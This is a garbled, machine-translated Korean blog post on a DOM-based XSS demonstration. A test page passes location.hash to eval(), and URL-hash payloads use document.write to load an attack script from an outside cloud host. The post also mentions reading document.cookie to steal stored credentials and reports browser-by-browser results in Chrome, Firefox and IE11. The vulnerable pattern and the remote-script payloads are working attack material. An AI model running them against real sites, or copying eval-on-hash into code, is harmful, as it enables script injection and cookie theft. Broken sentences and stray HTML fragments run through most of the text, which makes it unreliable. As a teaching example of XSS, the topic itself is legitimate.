간단 한 DOM XSS 공격 실험 을 기억 해 주세요.
index.html
XSSdemo
eval(location.hash.substr(1))
핵심 코드: eval (location. hash. substr (1))
xss. js (XSS 공격 스 크 립 트, 일곱 개의 소 구름 에 저장:http://ov6jc8fwp.bkt.clouddn....)
alert(" XSS !")핵심 코드: alert ("당신 의 사이트 가 XSS 에 공격 당 했 습 니 다!") Cookie 는 자주 입력 점 으로 사용 되 며, escape (document. cookie) 를 사용 하여 사용자 Cookie 에 저 장 된 민감 한 정 보 를 얻 을 수 있 습 니 다. 예 를 들 어 전화번호, 비밀번호 등 입 니 다.
어떻게 공격 합 니까?
접근 대기 파일 xss. html 의 url 에 hash 값 을 추가 합 니 다
#document.write("") 예 를 들 면:file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write("")</p>
<p>실제 환경 에서 이 부분 은file:///C:/Users/jack/Desktop/XSSdemo/이 가능 하 다, ~ 할 수 있다,...http://192.168.32.89:80/,http://192.16.32.89:8080/등 실제 주소.lt;br>전체 형식:http://192.16.32.89:8080/index.html#document.write("<script/src=//http://ov6jc8fwp.bkt.clouddn....;")
Chrome ?
Chrome
file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write(")</p>
</blockquote>
<p> Chrome , :</p>
<p><span class="img-wrap"></span></p>
<p> ?<br> Chrome filter , 。</p>
<h5> FireFox ?</h5>
<p>( Firefox 57.0 Quantum )<br> 。<br><code>eval(decodeURI(location.hash.substr(1)))</code><br> <code>file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write(<script/src=http://ov6jc8fwp.bkt.clouddn.com/xss.js> ")
XSS FireFox !
,XSS index.html
IE ?
( IE11.726.15063.0 )
XSS IE11 !
, , , ?
NoNoNo, 。
javascript eval() , , eval() XSS , :
location.hash.substr(1), 'document.write(")'</p>
<p> eval(decodeURI(location.hash.substr(1)))<br> eval'(document.write(`<script/src=http://ov6jc8fwp.bkt.clouddn....; ")')
,eval() XSS , eval() 。
, Chrome XSS , Chrome 。
XSS , , !
That's it !
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Thymeleaf 의 일반 양식 제출 과 AJAX 제출텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.
좋은 웹페이지 즐겨찾기
